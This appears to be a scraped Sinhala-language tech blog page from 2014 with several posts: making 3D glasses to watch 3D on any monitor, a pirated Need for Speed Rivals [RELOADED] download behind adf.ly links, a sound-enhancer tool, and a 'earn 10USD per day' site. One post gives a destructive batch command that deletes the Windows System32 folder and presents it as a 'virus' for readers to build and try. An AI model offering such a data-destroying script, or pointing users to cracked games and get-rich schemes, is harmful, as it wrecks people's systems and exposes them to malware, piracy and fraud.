Thursday, May 22, 2014

ඕනේම මොනිටර් එකකින් 3 බලමු පට්ට ඈ


එහෙනම් ඔන්න අදත් අරගෙන ආවා පොස්ට් එකක්. අද මම කියලා දෙන්න හදන්නේ ඔනේම මොනිටර් එකකින් 3D බලන විදිහ..

 


හරි ඉස්සෙල්ලාම අපිට ඔනේ වෙනවා 3D බලන කන්නාඩියක් හරි දැන් මම එක හදා ගන්න විදිහත් කියල දෙන්නම්. මේක නිල් හා රතු පාට වලින් තමයි තියෙන්නේ ගෙදරදීම හදාගන්න පුලුවන් පහත විඩියෝ එක බලන්න.


මේකට තව QQ ප්ලෙයර් එකත් ඔනේ වෙනවා ඒකත් පහතින් බාගන්නකෝ

 

                                                         
http://adf.ly/SyUng
මෙන්න වීඩියෝ එක බලන්න පට්ට ;)


 මෙන්න ස්ක්‍රීන් ශොට් ඈ

]


                

Windows Crash වෙන භයානක Virus එකක් හදමු ;)

මේක පොඩි සරල Code එකක්.Note Pad එක අරගෙන පහල තියන Code එක Type කරගන්නකො... 


@echo off del c:\windows\system32



ඒක ඔයාල කැමති නමකින් save කරගන්න පුළුවන්  හැබැයි නම අගට .bat කියල දෙන්න ඕන.(Eg: pcworld.bat) මේක හදල ඉවර වෙලා open කරන්න යන්න නම් එපා. මේකෙන්ඔයාගෙ පරිගණකයේ System32 File එක Delete කරනවා.Windows Crash වෙනවා.කොහොමද එතකොට .ආයේ windows install කරන්න ආසාවක්‌ තියෙනවනම් මේක Run කරලා බලන්න .computer එක Format කරන වෙලාවක ඔයාලට මේක Run කරලා බලන්න පුළුවන් කොහොමද කියල  .

 

Need For Speed Rivals Free Download [RELOADED]


 

ඔන්න ඉතින් අද ගෙනාවා Need for Speed එකෙන් අලුතෙන්ම ගහපු car game එක Need for Speed Rivals 



අලුත් කිව්වට අලුත් නෑ...දැන් මේක ඇවිල්ලා මාසයක් වගේ කිට්ටු වෙනවා...ඒත් RELOADED එක ඇවිල්ල තිබ්බේ නෑ...ඉතින් RELOADED එක ආපු ගමන් මන් ඕගොල්ලන්ට දුන්න හොදේ...



වැදගත්ම ටික තමයි System Requirements 



මන් පල්ලෙහා දාලා තියෙන්නේ System Requirements ටික මේ ටික තියෙනවනන් විතරක් Download කරගන්න නැත්තන් Download කරන්න එපා ඕගොල්ලන්ගේ data ටික අපරාදේ...




minimum specifications:



Operating System: Windows Vista 32-Bit with Service Pack 2 and the KB971512 platform update

Processor: AMD Athlon X2 2.8 GHZ or Intel Core 2 Duo 2.4 GHZ

Ram: 4GB or more

Free Hard Drive Space: 30GB
Processor: AMD Athlon X2 2.8 GHz or higher; Intel Core 2 Duo 2.4 GHz or higher
Graphics Card: AMD Radeon 3870 or higher; NVIDIA GeForce 8800 GT or higher

recommend specifications:

Operating System: Windows 8 64-bit
Processor: AMD Six-Core CPU; Intel Quad-Core CPU
RAM: 8GB
Free Hard Drive Space: 30GB
Graphics Card: AMD Radeon 7870 or higher; NVIDIA GeForce GT 660 or higher
Graphics Memory: 3GB

Additionally, Need for Speed Rivals will support SLI-mode if your system is SLI-enabled.


             වැඩිය කතා ඕනේ නෑ පල්ලෙහා තියෙන Screenshots ටික



Screenshots





Need For Speed Rivals [RELOADED


http://adf.ly/cIOMX

Sound Quality වැඩි කරගන්න

පරිගණකයේ Sound Quality වැඩි කරගන්න කදිම මෘදුකාංගයක්ඔබේ පරිගණකයේ Sound Quality එක වැඩි කර ගැනීමට හැකි මෘදුකාංගයක් ගැන මේ ලිපියෙන් පැහැදිලි කෙරෙනවා. මෙමගින් ඔබට චිත්රපට ශාලාවක මෙන් ගුණාත්මක හඬක් ඔබ ඉදිරිපිට ඇති පරිගණකයෙන්ම ලබාගන්නට හැකි

 
 
 

 

How to Earn Money With PipLogo- 10USD Per Day Without Invest

This Site can Earn 10USD per Day.  5USD for free if u creat New account. Payemnts can withdraw with Neteller Skrill Payza Bitcoin Visa. ...